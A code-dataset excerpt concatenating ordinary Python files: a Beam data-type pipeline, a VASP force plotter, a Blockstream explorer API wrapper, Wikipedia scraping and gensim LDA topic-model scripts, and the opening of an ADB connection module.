class Collect(beam.DoFn):
def process(self, element):
# Returns a list of tuples containing feature, feature values and feature type
result = []
for feature in element:
if(isfloat(element[feature])):
result.append((feature,element[feature],'Numeric'))
elif(element[feature] != "?"):
result.append((feature,element[feature],'String'))
return result
def data_type_reference(argv=None, save_main_session=True):
"""Main entry point; defines and runs the wordcount pipeline."""
parser = argparse.ArgumentParser()
parser.add_argument(
'--input',
dest='input',
required=True,
help='Input file to process.')
parser.add_argument(
'--output',
dest='output',
required=True,
help='Output file to write results to.')
parser.add_argument(
'--temp',
dest='temp',
required=True,
help='Temp file')
known_args, pipeline_args = parser.parse_known_args(argv)
print(known_args.input,known_args.output)
pipeline_options = PipelineOptions(pipeline_args)
pipeline_options.view_as(SetupOptions).save_main_session = save_main_session
p = beam.Pipeline(options=pipeline_options)
raw_header = pd.read_csv(known_args.input,header=None,nrows=1)
print(raw_header)
header_array = []
for i in range(raw_header.shape[1]):
header_array.append(raw_header.iloc[0,i])
csv_lines = (
p | beam.io.ReadFromText(known_args.input,skip_header_lines=1) |
beam.ParDo(Split(),header_array)
)
def distinct_count_extract(l):
(tuple_list, number) = l
return (tuple_list[0], (1,tuple_list[2]))
def count_values(value_ones):
(feature,arr) = value_ones
ones = [i[0] for i in arr]
type = [i[1] for i in arr]
return (feature, sum(ones),max(type, key = type.count))
def feature_reference(value_counts):
(index,counts,type) = value_counts
if(counts == 2):
return (index,"Boolean")
elif(counts > 2 and counts <= 15):
return (index,"Categorical")
elif(type == "Numeric"):
return (index,"Numeric")
return (index,"String")
type_reference = (
csv_lines | beam.ParDo(Collect()) |
"PerElement Count" >> beam.combiners.Count.PerElement() |
"Distinct Count Preprocess" >> beam.Map(distinct_count_extract) |
"Distinct Count Group" >> beam.GroupByKey() |
"Distinct Count" >> beam.Map(count_values) |
"Map Result" >> beam.Map(feature_reference)
)
output = (
type_reference | beam.io.WriteToText(known_args.output)
)
result = p.run()
result.wait_until_finish()
return known_args
``` |
{
"source": "843436348989172/benwmcdowell",
"score": 2
} |
#### File: 843436348989172/benwmcdowell/plot_forces.py
```python
import matplotlib.pyplot as plt
import sys
import getopt
from numpy import array,dot,percentile,average
from numpy.linalg import norm
def main(outcar,poscar,**args):
if 'quiet' in args and args['quiet']:
quiet=True
else:
quiet=False
try:
seldyn = parse_poscar(poscar)[4]
except IndexError or FileNotFoundError:
seldyn='none'
forces,time,tol=parse_forces(outcar,seldyn=seldyn)
minima=[[],[],[],[]]
averages=[[],[],[],[]]
maxima=[[],[],[],[]]
upperq=[[],[],[],[]]
lowerq=[[],[],[],[]]
for i in range(4):
if len(forces[i])>0:
for j in forces[i]:
if len(j)>0:
minima[i].append(min(j))
averages[i].append(average(j))
maxima[i].append(max(j))
upperq[i].append(percentile(j,75))
lowerq[i].append(percentile(j,25))
if not quiet:
data_labels=['minimum','lower quartile','average','upper quartile','maximum']
data_sets=[minima,lowerq,averages,upperq,maxima]
else:
data_labels=['minimum','average','maximum']
data_sets=[minima,averages,maxima]
#each component and the total force are plotted on their own subplot, along with the convergence criteria set by EDIFFG
fig,axs=plt.subplots(4,1,sharex=True,figsize=(14,8))
for i,j in zip(range(4),['_x','_y','_z','_{total}']):
for k,l in zip(data_labels,data_sets):
try:
axs[i].scatter(time,l[i],label=k)
max_range=max(maxima[i])-min(minima[i])
axs[i].set_ylim(bottom=min(minima[i])-0.05*max_range,top=max(maxima[i])+0.05*max_range)
except ValueError:
pass
if len(time)==1:
axs[i].plot([-1,1],[tol,tol],linestyle='dashed',label='convergence')
else:
axs[i].plot([time[0],time[-1]],[tol,tol],linestyle='dashed',label='convergence')
axs[i].set(ylabel='$F{}$'.format(j)+' / eV $\AA^{-1}$')
if time[-1]-time[0]>0.0:
axs[-1].set(xlabel='optimization time / fs')
else:
axs[-1].set(xlabel='optimization steps')
handles, labels = axs[2].get_legend_handles_labels()
fig.legend(handles, labels, bbox_to_anchor=(1.01,0.5), loc='right')
plt.show()
def parse_forces(ifile,**args):
if 'seldyn' in args:
seldyn=args['seldyn']
else:
seldyn='none'
time=[]
forces=[[],[],[],[]]
try:
with open(outcar,'r') as file:
searching=True
while searching:
line=file.readline()
if not line:
break
if 'EDIFFG' in line:
line=line.split()
tol=abs(float(line[line.index('EDIFFG')+2]))
if 'POTIM' in line:
line=line.split()
potim=float(line[line.index('POTIM')+2])
if potim==0.0:
potim=-1.0
if 'NIONS' in line:
line=line.split()
atomnum=int(line[line.index('NIONS')+2])
if seldyn=='none':
seldyn=['TTT' for i in range(atomnum)]
elif 'TOTAL-FORCE' in line:
line=file.readline()
temp_forces=[[],[],[],[]]
for i in range(atomnum):
line=file.readline().split()
tempvar=[]
for j in range(3,6):
if seldyn[i][j-3]=='T':
temp_forces[j-3].append(abs(float(line[j])))
tempvar.append(abs(float(line[j])))
if len(tempvar)>0:
temp_forces[3].append(norm(array(tempvar)))
for i in range(4):
forces[i].append(temp_forces[i])
if len(time)==0:
time.append(0.0)
else:
time.append(time[-1]+abs(potim))
except:
print('error reading OUTCAR')
sys.exit(1)
if len(time)==0:
print('zero ionic steps read from OUTCAR')
sys.exit()
return forces,time,tol
def parse_poscar(ifile):
with open(ifile, 'r') as file:
lines=file.readlines()
sf=float(lines[1])
latticevectors=[float(lines[i].split()[j])*sf for i in range(2,5) for j in range(3)]
latticevectors=array(latticevectors).reshape(3,3)
atomtypes=lines[5].split()
atomnums=[int(i) for i in lines[6].split()]
if lines[7].split()[0] == 'Direct':
start=8
else:
start=9
seldyn=[''.join(lines[i].split()[-3:]) for i in range(start,sum(atomnums)+start)]
coord=array([[float(lines[i].split()[j]) for j in range(3)] for i in range(start,sum(atomnums)+start)])
for i in range(sum(atomnums)):
coord[i]=dot(latticevectors,coord[i])
#latticevectors formatted as a 3x3 array
#coord holds the atomic coordinates with shape ()
try:
return latticevectors, coord, atomtypes, atomnums, seldyn
except NameError:
return latticevectors, coord, atomtypes, atomnums
if __name__=='__main__':
outcar='./OUTCAR'
poscar='./POSCAR'
quiet=False
try:
opts,args=getopt.getopt(sys.argv[1:],'ho:p:q',['help','outcar=','poscar','quiet'])
except getopt.GetoptError:
print('error in command line syntax')
sys.exit(2)
for i,j in opts:
if i in ['-h','--help']:
print('''
input options:
-o, --outcar specify a path to the OUTCAR file other than ./OUTCAR
-p, --poscar specify an path to the POTCAR file other than ./POSCAR
-q, --quiet suppresses plotting of quartiles for a less crowded output
help options:
-h, --help display this help message
''')
sys.exit()
if i in ['-o','--outcar']:
outcar=j
if i in ['-p','--poscar']:
poscar=j
if i in ['-q','--quiet']:
quiet=True
main(outcar,poscar,quiet=quiet)
``` |
{
"source": "84adam/blockstream",
"score": 3
} |
#### File: blockstream/blockstream/blockexplorer.py
```python
from . import util
def get_transaction(tx_id):
"""
Request information about a transaction by ID
:param str tx_id: transaction ID
:return: an instance of :class:`Transaction` class
"""
resource = f'tx/{tx_id}'
tx_data = util.call_api(resource)
return Transaction(tx_data)
def get_transaction_status(tx_id):
"""
Request the transaction confirmation status
:param str tx_id: transaction ID
:return: an instance of :class:`TransactionStatus` class
"""
resource = f'tx/{tx_id}/status'
response = util.call_api(resource)
return TransactionStatus(response)
def get_transaction_hex(tx_id):
"""
Request the raw transaction in hex
:param str tx_id: transaction ID
:return: dictionary containing tx hex
"""
resource = f'tx/{tx_id}/hex'
response = util.call_api(resource)
return response # figure this better maybe
def get_transaction_merkle_proof(tx_id):
"""
Request the merkle intrusion proof of a transaction
:param str tx_id: transaction ID
:return: an instance of :class:`TransactionMerkle` class
"""
resource = f'tx/{tx_id}/merkle-proof'
response = util.call_api(resource)
return TransactionMerkleProof(response)
def get_transaction_output_status(tx_id, vout):
"""
Request the spending status of a transaction output
:param str tx_id: transaction ID
:param str vout: transaction output
:return: an instance of :class:`TransactionOutput` class
"""
resource = f'tx/{tx_id}/outspend/{vout}'
response = util.call_api(resource)
return TransactionOutput(response)
def get_all_transaction_outputs_statuses(tx_id):
"""
Request the spending status of all transaction outputs
:param str tx_id: transaction ID
:return list: a list of :class:`TransactionOutput` objects
"""
resource = f'tx/{tx_id}/outspends'
response = util.call_api(resource)
outspends = []
for output in response:
outspends.append(TransactionOutput(output))
return outspends
def post_transaction():
"""
Broadcast a raw transaction to the network
"""
pass
def get_address(address):
"""
Request address information
:param str address: a bitcoin address/scripthash
:return: an instance of :class:`Address` class
"""
resource = f'address/{address}'
response = util.call_api(resource)
return Address(response)
def get_address_transactions(address):
"""
Request all transactions for an address, newest first
"""
resource = f'address/{address}/txs'
response = util.call_api(resource)
transactions = []
for tx in response:
transactions.append(Transaction(tx))
return transactions
def get_confirmed_transaction_history(address, ls_tx_id=''):
"""
Request confirmed transaction history for an address, newest first
25 per page
:param str address: a bitcoin address
:param str ls_tx_id: last transaction ID
:return list:
"""
resource = f'address/{address}/txs/chain/{ls_tx_id}'
response = util.call_api(resource)
confirmed_transactions = []
for tx in response:
confirmed_transactions.append(Transaction(tx))
return confirmed_transactions
def get_address_mempool(address):
"""
Request unconfirmed transaction history of an address, newest first
up to 50 transactions no paging
:param str address: a bitcoin address
:return list: a list of :class:`Transaction` objects
"""
resource = f'address/{address}/txs/mempool'
response = util.call_api(resource)
mempool_transactions = []
for tx in response:
mempool_transactions.append(Transaction(tx))
return mempool_transactions
def get_address_utxo(address):
"""
Request the list of unspent transaction outputs associated with
an address
:param str address: a bitcoin address
:return list: a list of :class:`UTXO` objects
"""
resource = f'address/{address}/utxo'
response = util.call_api(resource)
utxo_list = []
for utxo in response:
utxo_list.append(UTXO(utxo))
return utxo_list
def get_block_by_hash(block_hash):
"""
Request a given block by hash
:param str block_hash: a bitcoin block hash
:return: an instance of :class:`Block` class
"""
resource = f'block/{block_hash}'
response = util.call_api(resource)
return Block(response)
def get_block_by_height(height):
"""
Request a given block by height
:param str height: a bitcoin block height
:return: an instance of :class:`Block` class
"""
block_hash = get_block_hash_from_height(height)
resource = f'block/{block_hash}'
response = util.call_api(resource)
return Block(response)
def get_block_hash_from_height(height):
"""
Request a block hash by specifying the height
:param str height: a bitcoin block height
:return: a bitcoin block address
"""
resource = f'block-height/{height}'
return util.call_api(resource)
def get_block_status(block_hash):
"""
Request the block status
:param str block_hash: a bitcoin block hash
:return: an instance of :class:`BlockStatus` class
"""
resource = f'block/{block_hash}/status'
response = util.call_api(resource)
return BlockStatus(response)
def get_block_transactions(block_hash, start_index='0'):
"""
Request a list of transactions in a block (up to 25)
:param str block_hash: a bitcoin block hash
:param str start_index: index of transaction list to start from
"""
resource = f'block/{block_hash}/txs/{start_index}'
response = util.call_api(resource)
transactions = []
for tx in response:
transactions.append(Transaction(tx))
return transactions
def get_transaction_ids(block_hash):
"""
Request a list of all transaction IDs in a block
:param str block_hash: a bitcoin block hash
:return: a list of transaction IDs in the block
"""
resource = f'block/{block_hash}/txids'
response = util.call_api(resource)
return response
def get_blocks(start_height=''):
"""
Request the 10 newest blocks starting at tip (most recent)
or at start_height (optional)
:param str start_height: block height
:return: a list of :class:`Block` objects
"""
resource = f'blocks/{start_height}'
response = util.call_api(resource)
blocks = []
for block in response:
blocks.append(Block(block))
return blocks
def get_last_block_height():
"""
Request the height of the last block
:return dict: most recent block height in bitcoin
"""
resource = 'blocks/tip/height'
return util.call_api(resource)
def get_last_block_hash():
"""
Request the hash of the last block
"""
resource = 'blocks/tip/hash'
return util.call_api(resource)
def get_mempool():
"""
Request mempool backlog statistics
"""
response = util.call_api('mempool')
return Mempool(response)
def get_mempool_transaction_ids():
"""
Request the full list of transactions IDs currently in the mempool,
as an array
:return list: a list of transaction IDs
"""
resource = 'mempool/txids'
return util.call_api(resource)
def get_mempool_recent_transactions():
"""
Request a list of the last 10 transactions to enter the mempool
:return list: a list of transaction IDs
"""
resource = 'mempool/recent'
response = util.call_api(resource)
transactions = []
for tx in response:
transactions.append(MempoolRecent(tx))
return transactions
def get_fee_estimates():
"""
Request an object where the key is the confirmation target (in number
of blocks) and the value is estimated fee rate (in sat/vB)
:return: an instance of :class:`FeeEstimate` class
"""
response = util.call_api('fee-estimates')
return FeeEstimates(response)
class BlockStatus:
"""Bitcoin block status utility."""
def __init__(self, status):
self.in_best_chain = status['in_best_chain']
self.height = status['height']
self.next_best = status['next_best']
class Block:
"""Bitcoin block utility class"""
def __init__(self, block):
self.id = block['id']
self.height = block['height']
self.version = block['version']
self.timestamp = block['timestamp']
self.tx_count = block['tx_count']
self.size = block['size']
self.weight = block['weight']
self.merkle_root = block['merkle_root']
self.previous_block_hash = block['previousblockhash']
self.nonce = block['nonce']
self.bits = block['bits']
class Address:
"""Bitcoin Address utility class."""
def __init__(self, address):
self.address = address['address'] # str
self.chain_stats = address['chain_stats'] # dict
self.mempool_stats = address['mempool_stats'] # dict
class UTXO:
"""Bitcoin UTXO utility class."""
def __init__(self, utxo):
self.tx_id = utxo['txid']
self.vout = utxo['vout']
self.status = TransactionStatus(utxo['status'])
self.value = utxo['value']
class TransactionStatus:
"""Transaction status utility."""
def __init__(self, status):
self.confirmed = status['confirmed']
self.block_height = status['block_height']
self.block_hash = status['block_hash']
self.block_time = status['block_time']
class TransactionMerkleProof:
"""Tx Merkle proof utility."""
def __init__(self, merkle):
self.block_height = merkle['block_height']
self.merkle = merkle['merkle']
self.pos = merkle['pos']
class TransactionOutput:
"""Tx Output utility."""
def __init__(self, output):
self.spend = output['spent']
self.tx_id = output['txid']
self.vin = output['vin']
self.status = TransactionStatus(output['status'])
class Transaction:
"""Bitcoin Transaction utility class."""
def __init__(self, transaction):
self.id = transaction['txid']
self.version = transaction['version']
self.locktime = transaction['locktime']
self.vin = transaction['vin']
self.vout = transaction['vout']
self.size = transaction['size']
self.weight = transaction['weight']
self.fee = transaction['fee']
self.status = TransactionStatus(transaction['status'])
class Mempool:
"""Bitcoin Mempool utility class."""
def __init__(self, mempool):
self.count = mempool['count']
self.vsize = mempool['vsize']
self.total_fee = mempool['total_fee']
self.fee_histogram = mempool['fee_histogram']
class MempoolRecent:
"""Recent TXs in mempool utility."""
def __init__(self, info):
self.tx_id = info['txid']
self.fee = info['fee']
self.vsize = info['vsize']
self.value = info['value']
class FeeEstimates:
"""Fee Estimates utility class."""
def __init__(self, data):
self.two_blocks = data['2']
self.three_blocks = data['3']
self.four_blocks = data['4']
self.six_blocks = data['6']
self.ten_blocks = data['10']
self.twenty_blocks = data['20']
self.onefourfour_blocks = data['144']
self.fivezerofour_blocks = data['504']
self.tenzeroeight_blocks = data['1008']
``` |
{
"source": "84adam/python3-nlp",
"score": 3
} |
#### File: 84adam/python3-nlp/get_wiki.py
```python
import bs4
import requests
from urllib.request import urlopen
from itertools import chain
from html.parser import HTMLParser
from requests import get
import os
import time
from pathlib import Path
import pandas as pd
from keras.preprocessing.text import text_to_word_sequence
# WIKI TEXT BODY SCRAPING FUNCTION
def wiki_text(url):
response = requests.get(url)
para_text = []
if response is not None:
html = bs4.BeautifulSoup(response.text, 'html.parser')
title = html.select("#firstHeading")[0].text
paragraphs = html.select("p")
for para in paragraphs:
para_text.append(para.text.strip())
return ' '.join([x for x in para_text])
# FUNCTIONS/CLASS TO SCRAPE LINKS FROM A WEBSITE
class LinkParser(HTMLParser):
def reset(self):
HTMLParser.reset(self)
self.links = iter([])
def handle_starttag(self, tag, attrs):
if tag == 'a':
for name, value in attrs:
if name == 'href':
self.links = chain(self.links, [value])
def gen_links(f, parser):
encoding = f.headers.get_content_charset() or 'UTF-8'
for line in f:
parser.feed(line.decode(encoding))
yield from parser.links
# WIKIPEDIA SPECIFIC LINK-SCRAPING FUNCTION
def wiki_gen_links(f, parser):
links_list = []
wiki_list = []
links = gen_links(f, parser)
for i in links:
links_list.append(i)
for i in links_list:
if i[0:6] == "/wiki/":
if ":" not in i:
if "#" not in i:
wiki_list.append(i[6:])
set_links_list = [x for x in set(list(wiki_list))]
return set_links_list
# BASE URLs FROM WHICH TO SCRAPE ADDITIONAL ARTICLES
base_urls = ['https://en.wikipedia.org/wiki/Graphic_design', 'https://en.wikipedia.org/wiki/Marketing',
'https://en.wikipedia.org/wiki/Communication', 'https://en.wikipedia.org/wiki/Sales',
'https://en.wikipedia.org/wiki/Finance', 'https://en.wikipedia.org/wiki/Accounting',
'https://en.wikipedia.org/wiki/Law', 'https://en.wikipedia.org/wiki/Business',
'https://en.wikipedia.org/wiki/Business_administration', 'https://en.wikipedia.org/wiki/Value-added_reseller',
'https://en.wikipedia.org/wiki/Customer_service', 'https://en.wikipedia.org/wiki/User_experience',
'https://en.wikipedia.org/wiki/Energy', 'https://en.wikipedia.org/wiki/Transport',
'https://en.wikipedia.org/wiki/Industry', 'https://en.wikipedia.org/wiki/Manufacturing',
'https://en.wikipedia.org/wiki/Electronics', 'https://en.wikipedia.org/wiki/Software',
'https://en.wikipedia.org/wiki/Engineering', 'https://en.wikipedia.org/wiki/Technology',
'https://en.wikipedia.org/wiki/Mathematics', 'https://en.wikipedia.org/wiki/System',
'https://en.wikipedia.org/wiki/Knowledge', 'https://en.wikipedia.org/wiki/Logic',
'https://en.wikipedia.org/wiki/Engineer', 'https://en.wikipedia.org/wiki/Microcontroller',
'https://en.wikipedia.org/wiki/Industrial_control_system', 'https://en.wikipedia.org/wiki/PID_controller',
'https://en.wikipedia.org/wiki/Control_loop', 'https://en.wikipedia.org/wiki/Programmable_logic_controller',
'https://en.wikipedia.org/wiki/Assembly_line', 'https://en.wikipedia.org/wiki/Robotics',
'https://en.wikipedia.org/wiki/Petroleum_engineering', 'https://en.wikipedia.org/wiki/Industrial_engineering',
'https://en.wikipedia.org/wiki/Open-source_software', 'https://en.wikipedia.org/wiki/Electrical_engineering',
'https://en.wikipedia.org/wiki/Computer_engineering', 'https://en.wikipedia.org/wiki/Computer_science',
'https://en.wikipedia.org/wiki/Mechanical_engineering', 'https://en.wikipedia.org/wiki/Microsoft_Windows',
'https://en.wikipedia.org/wiki/Operating_system', 'https://en.wikipedia.org/wiki/Computer_program',
'https://en.wikipedia.org/wiki/Human%E2%80%93computer_interaction', 'https://en.wikipedia.org/wiki/History',
'https://en.wikipedia.org/wiki/Art', 'https://en.wikipedia.org/wiki/Music', 'https://en.wikipedia.org/wiki/Food',
'https://en.wikipedia.org/wiki/Education', 'https://en.wikipedia.org/wiki/Health',
'https://en.wikipedia.org/wiki/Medicine', 'https://en.wikipedia.org/wiki/Politics',
'https://en.wikipedia.org/wiki/Management', 'https://en.wikipedia.org/wiki/Chemistry',
'https://en.wikipedia.org/wiki/Biology', 'https://en.wikipedia.org/wiki/Physics',
'https://en.wikipedia.org/wiki/Geology', 'https://en.wikipedia.org/wiki/Astronomy',
'https://en.wikipedia.org/wiki/Anthropology', 'https://en.wikipedia.org/wiki/Sociology',
'https://en.wikipedia.org/wiki/Psychology', 'https://en.wikipedia.org/wiki/Science',
'https://en.wikipedia.org/wiki/Formal_science', 'https://en.wikipedia.org/wiki/Natural_science',
'https://en.wikipedia.org/wiki/Social_science', 'https://en.wikipedia.org/wiki/Game_theory',
'https://en.wikipedia.org/wiki/Network_theory', 'https://en.wikipedia.org/wiki/Artificial_neural_network',
'https://en.wikipedia.org/wiki/Broadcast_network', 'https://en.wikipedia.org/wiki/Electrical_network',
'https://en.wikipedia.org/wiki/Social_networking_service',
'https://en.wikipedia.org/wiki/Telecommunications_network', 'https://en.wikipedia.org/wiki/Computer_network',
'https://en.wikipedia.org/wiki/Transport_network', 'https://en.wikipedia.org/wiki/Money',
'https://en.wikipedia.org/wiki/Bitcoin', 'https://en.wikipedia.org/wiki/Gold',
'https://en.wikipedia.org/wiki/Silver', 'https://en.wikipedia.org/wiki/Fiat_money',
'https://en.wikipedia.org/wiki/Bank', 'https://en.wikipedia.org/wiki/Economics',
'https://en.wikipedia.org/wiki/Production_(economics)', 'https://en.wikipedia.org/wiki/Service_(economics)',
'https://en.wikipedia.org/wiki/Utility', 'https://en.wikipedia.org/wiki/The_arts',
'https://en.wikipedia.org/wiki/Philosophy', 'https://en.wikipedia.org/wiki/Theatre',
'https://en.wikipedia.org/wiki/Film', 'https://en.wikipedia.org/wiki/Dance',
'https://en.wikipedia.org/wiki/Fine_art', 'https://en.wikipedia.org/wiki/Applied_arts',
'https://en.wikipedia.org/wiki/Linguistics', 'https://en.wikipedia.org/wiki/Slang',
'https://en.wikipedia.org/wiki/Sarcasm', 'https://en.wikipedia.org/wiki/Culture',
'https://en.wikipedia.org/wiki/Security', 'https://en.wikipedia.org/wiki/Media',
'https://en.wikipedia.org/wiki/List_of_countries_by_spoken_languages', 'https://en.wikipedia.org/wiki/Humanities',
'https://en.wikipedia.org/wiki/Sport', 'https://en.wikipedia.org/wiki/Relationship',
'https://en.wikipedia.org/wiki/Religion', 'https://en.wikipedia.org/wiki/Faith',
'https://en.wikipedia.org/wiki/Spirituality', 'https://en.wikipedia.org/wiki/Literature',
'https://en.wikipedia.org/wiki/Fiction', 'https://en.wikipedia.org/wiki/Nonfiction',
'https://en.wikipedia.org/wiki/Classics', 'https://en.wikipedia.org/wiki/Western_world',
'https://en.wikipedia.org/wiki/Eastern_world', 'https://en.wikipedia.org/wiki/Renaissance',
'https://en.wikipedia.org/wiki/History_by_period', 'https://en.wikipedia.org/wiki/List_of_time_periods',
'https://en.wikipedia.org/wiki/Category:History_of_science_and_technology_by_country']
# COLLECTION OF LINKS FROM WIKIPEDIA ARTICLES
url_list = []
wiki_base = "https://en.wikipedia.org/wiki/"
for i in base_urls:
if i not in url_list:
url_list.append(i)
parser = LinkParser()
f = urlopen(i)
wlinks = wiki_gen_links(f, parser)
for l in wlinks:
if l not in url_list:
url_list.append(wiki_base + l)
# GATHER BODY TEXT FROM ALL ARTICLES IN url_list
# Use time.sleep(1) or greater between downloads
def wiki_all_text(url_list):
print("Downloading {} documents...\n".format(len(url_list)))
all_docs = []
for i in url_list:
print("Fetching text from: {}".format(i))
all_docs.append(wiki_text(i))
time.sleep(0.5)
print("Download complete.\n")
return all_docs
# RUN IT
idx = url_list
doc = wiki_all_text(url_list)
# CREATE DATAFRAME AND CSV FILE FOR EXPORT
wiki_df = pd.DataFrame({'index':[x for x in idx], 'doc':[' '.join(text_to_word_sequence(str(x))) for x in doc]})
wiki_df.to_csv('wiki_df.csv')
wiki_df.head(30)
```
#### File: 84adam/python3-nlp/infer_topics.py
```python
import sys
import os
import nltk
import spacy
import gensim
import sklearn
import keras
import pandas as pd
import numpy as np
from nltk.corpus import stopwords
from nltk.stem import WordNetLemmatizer, SnowballStemmer
from nltk.stem.porter import *
nltk.download('wordnet')
nltk.download('stopwords')
from gensim.parsing.preprocessing import STOPWORDS
from gensim.utils import simple_preprocess
from gensim import corpora, models
from keras.preprocessing.text import text_to_word_sequence
from sklearn.feature_extraction import stop_words
# define stopwords
def add_words(filename):
with open(filename) as f:
additional_words = f.readlines()
additional_words = [x.strip() for x in additional_words]
return additional_words
def remove_words(filename):
with open(filename) as f:
unstop = f.readlines()
unstop = [x.strip() for x in unstop]
return unstop
def define_stopwords():
"""
default: combine SKLEARN, NLTK, and SPACY stopwords -> 'sns_set'
alternative: set custom 'additional_words' and 'unstop' words (to ignore)
function returns a list: 'stopwords'
"""
# corpus-specific stop words [OPTIONAL]
# add 'stop.txt' to local directory, pass as argument 2
additional_words = ['nan']
# don't remove these words which may be important in our context [OPTIONAL]
# add 'unstop.txt' to local directory, pass as argument 3
unstop = []
gen_stop = gensim.parsing.preprocessing.STOPWORDS
nlp = spacy.load('en')
spacy_stop = nlp.Defaults.stop_words # .add("my_new_stopword")
sk_stop = stop_words.ENGLISH_STOP_WORDS
nltk_stop = stopwords.words('english')
custom_stop = additional_words
sns_stop = []
all_stop = []
# combine sklearn, nltk, and spacy stop word lists: sns_stop
# also add these to all_stop
for i in gen_stop:
if i not in unstop:
sns_stop.append(i)
all_stop.append(i)
for i in spacy_stop:
if i not in unstop:
sns_stop.append(i)
all_stop.append(i)
for i in sk_stop:
if i not in unstop:
sns_stop.append(i)
all_stop.append(i)
for i in nltk_stop:
if i not in unstop:
sns_stop.append(i)
all_stop.append(i)
# add corpus specific stop words to all_stop
for i in custom_stop:
if i not in unstop:
if i not in all_stop:
all_stop.append(i)
sns_set = list(set(sns_stop))
all_set = list(set(all_stop))
if len(custom_stop) == 0 and len(unstop) == 0:
# print(f'sns_set stopwords = {len(sns_set)} words: \nExamples: \n{[x for x in sns_set[0:10]]}\n{[x for x in sns_set[10:20]]}')
my_stopwords = sns_set
else:
# print(f'all_set (custom) stopwords = {len(all_set)} words: \nExamples: \n{[x for x in all_set[0:10]]}\n{[x for x in all_set[10:20]]}')
my_stopwords = all_set
return my_stopwords
# preprocessing functions
stemmer = PorterStemmer()
def lemmatize_stemming(text):
return stemmer.stem(WordNetLemmatizer().lemmatize(text, pos='v'))
def preprocess(text):
result = []
for token in gensim.utils.simple_preprocess(text):
if token not in my_stopwords and len(token) > 2:
result.append(lemmatize_stemming(token))
return result
def word_split(doc):
words = []
for word in doc.split(' '):
words.append(word)
return words
# Infer Topic Probability Distribution of New Document
def infer_topic(new_doc):
print("(1) Performing preprocessing...")
pre_new = preprocess(new_doc) # remove stop-words, lemmatize, and stem
print(f'{pre_new[0:5]} ...')
print("(2) Building term-frequency dictionary...")
dict_new = dictionary.doc2bow(pre_new) # build term-frequency dictionary
first_five = [f'{dict_new[i][0]}: \"{dictionary[dict_new[i][0]]}\"*{dict_new[i][1]}' for i in range(len(dict_new[0:5]))]
print(f'{[x for x in first_five]}')
print("(3) Inferring topic distribution...")
vector = model[dict_new] # get topic probability distribution for new_doc
print("\nTopic Probability Distribution:")
print(vector)
if __name__ == '__main__':
filepath = str(sys.argv[1]) # path to saved tf-lda* files, stop.txt, unstop.txt
new_doc = str(sys.argv[2])
filename_model = filepath + '/' + 'tf-lda.model'
filename_dict = filepath + '/' + 'tf-lda.dict'
filename_stop = filepath + '/' + 'stop.txt'
filename_unstop = filepath + '/' + 'unstop.txt'
print(f'\nLoading model files and stopwords...')
my_stopwords = define_stopwords()
new_words = add_words(filename_stop)
new_unstop = remove_words(filename_unstop)
for i in new_words:
my_stopwords.append(i)
my_stopwords = [w for w in my_stopwords if w not in new_unstop]
my_stopwords = list(set(my_stopwords))
print(f'Loaded {len(my_stopwords)} stopwords.\n')
model = gensim.models.LdaModel.load(filename_model)
dictionary = corpora.Dictionary.load(filename_dict)
# print all topics
for i in range(0, model.num_topics):
print(f'Topic #{i}: {model.print_topic(i)}')
print(f'\nPerforming inference on new document...')
infer_topic(new_doc)
```
#### File: 84adam/python3-nlp/train_model.py
```python
import os
import gensim
import pandas as pd
import numpy as np
import sys
import subprocess
import shlex
from gensim import corpora, models
# build topic model
arguments = sys.argv[1:]
if len(arguments) < 7:
print("\nERROR: Missing Required Arguments: ")
print("(1) dict_no_below; (2) dict_no_above; (3) dict_keep_n;")
print("(4) num_topics; (5) num_passes; (6) workers")
print("(7) processed_docs pkl file")
print("\nSuggested Defaults: ")
print("(1) 30; (2) 0.70; (3) 100000;")
print("(4) 20; (5) 2; (6) 2 [or: `nproc` - 1].")
print("(y) processed_docs.pkl.\n")
sys.exit(2)
dict_no_below = int(sys.argv[1])
dict_no_above = float(sys.argv[2])
dict_keep_n = int(sys.argv[3])
num_topics = int(sys.argv[4])
num_passes = int(sys.argv[5])
workers = int(sys.argv[6])
processed_docs = pd.read_pickle(sys.argv[7])
# load dictionary
print("Loading data...")
dictionary = gensim.corpora.Dictionary(processed_docs)
print(f'Unfiltered dictionary contains {len(list(dictionary.values()))} features.')
# filter dictionary
print("Filtering...")
dictionary.filter_extremes(no_below=dict_no_below, no_above=dict_no_above, keep_n=dict_keep_n)
print(f'Filtered dictionary contains {len(list(dictionary.values()))} features.')
bow_corpus = [dictionary.doc2bow(doc) for doc in processed_docs]
tfidf = models.TfidfModel(bow_corpus)
corpus_tfidf = tfidf[bow_corpus]
# set passes and range of topic numbers to try
range_num_topics = [num_topics]
# lists to index each type of model generated below
tf_set = [[] for x in range(len(range_num_topics))]
count = 0
# build one model of each type for every `num_topics` in `range_num_topics`
# append these to `tf_set`
print("\nHyperparameters selected: ")
print(f'dict_no_below = {dict_no_below}')
print(f'dict_no_above = {dict_no_above}')
print(f'dict_keep_n = {dict_keep_n}')
print(f'num_topics = {num_topics}')
print(f'num_passes = {num_passes}')
print(f'workers = {workers}')
print("\nInitializing model training...\n")
for i in range_num_topics:
num_topics = i
tf_set[count] = gensim.models.LdaMulticore(corpus_tfidf, num_topics=num_topics, id2word=dictionary, passes=num_passes, workers=workers)
count += 1
print(f'\nGensim LDA & TF-IDF model trained with {num_topics} topics: \n')
for x, y in zip(range_num_topics, tf_set):
print(f'\nTF-IDF model with {x} topics: \n')
for idx, topic in y.print_topics():
print(f'Topic #{idx}: {topic}')
# save trained model
filename_model = 'tf-lda.model'
filename_dict = 'tf-lda.dict'
tf_set[0].save(filename_model)
dictionary.save(filename_dict)
print("\nModel saved to current directory.")
print("Backing up model(s)...")
def subprocess_cmd(command):
process = subprocess.Popen(command,stdout=subprocess.PIPE, shell=True)
proc_stdout = process.communicate()[0].strip()
print(proc_stdout)
subprocess_cmd('bash tar_model.sh')
print("Model(s) backed up to ./models/saved-model")
print("DONE.\n")
``` |
{
"source": "84KaliPleXon3/andriller",
"score": 2
} |
#### File: andriller/andriller/adb_conn.py
```python
import re
import sys
import shlex
import os.path
import logging
import subprocess
if sys.platform == 'win32':
from .utils import placebo as timeout
else:
from timeout_decorator import timeout
from .config import CODEPATH # noqa
logger = logging.getLogger(__name__)
startupinfo = None
class ADBConn:
UNIX = ['linux', 'linux2', 'darwin']
MODES = {
'download': 'download',
'bootloader': 'bootloader',
'recovery': 'recovery',
'sideload': 'sideload',
'sideload-auto-reboot': 'sideload-auto-reboot',
}
def __init__(self, logger=logger, log_level=logging.INFO):
self.adb_bin = None
self.platform = sys.platform
self.rmr = b'\r\n'
